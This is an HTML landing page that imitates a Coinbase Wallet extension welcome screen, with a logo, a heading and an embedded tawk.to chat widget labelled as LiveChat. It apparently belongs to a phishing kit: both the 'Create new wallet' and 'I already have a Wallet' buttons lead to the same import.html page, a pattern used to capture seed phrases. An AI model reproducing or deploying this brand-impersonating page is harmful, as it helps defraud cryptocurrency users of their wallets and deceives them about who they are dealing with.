<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Coinbase Wallet Extension</title>
    <link rel="icon" href="favicon.png" type="image/png" />
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        background-color: black;
        color: white;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        height: 100vh;
      }

      .logo {
        width: 200px; /* Increased size */
        height: auto;
        margin-bottom: 30px; /* Increased margin */
      }

      h1 {
        font-size: 32px; /* Increased font size */
        margin: 20px 0; /* Increased margin */
        text-align: center;
      }

      .button {
        background-color: white;
        color: black;
        border: none;
        padding: 15px 30px; /* Increased padding */
        font-size: 20px; /* Increased font size */
        margin: 15px 0; /* Increased margin */
        border-radius: 50px;
        cursor: pointer;
        text-align: center;
      }

      .button:hover {
        background-color: #e6e6e6;
      }

      .button-secondary {
        background-color: black;
        color: white;
        border-radius: 50px;
      }

      .button-secondary:hover {
        background-color: #333;
      }

      @media screen {
        h1 {
          font-size: 32px; /* Match larger font size */
          margin: 20px 0; /* Match larger margin */
          text-align: center;
          line-height: 1.5;
        }
      }
    </style>
  </head>
  <body>
    <img src="logo.png" alt="Logo" class="logo" />
    <h1>Welcome to<br />Coinbase Wallet</h1>
    <a href="import.html"><button class="button">Create new wallet</button></a>
    <a href="import.html"
      ><button class="button button-secondary">
        I already have a Wallet
      </button></a
    >
    <!-- Start of LiveChat (www.livechat.com) code -->
    <script type="text/javascript">
      var Tawk_API = Tawk_API || {},
        Tawk_LoadStart = new Date();
      (function () {
        var s1 = document.createElement("script"),
          s0 = document.getElementsByTagName("script")[0];
        s1.async = true;
        s1.src = "https://embed.tawk.to/66a2a258becc2fed692b2b32/1i3lkkb6g";
        s1.charset = "UTF-8";
        s1.setAttribute("crossorigin", "*");
        s0.parentNode.insertBefore(s1, s0);
      })();
    </script>
    <noscript
      ><a href="https://www.livechat.com/chat-with/18929835/" rel="nofollow"
        >Chat with us</a
      >, powered by
      <a
        href="https://www.livechat.com/?welcome"
        rel="noopener nofollow"
        target="_blank"
        >LiveChat</a
      ></noscript
    >
    <!-- End of LiveChat code -->
  </body>
</html>
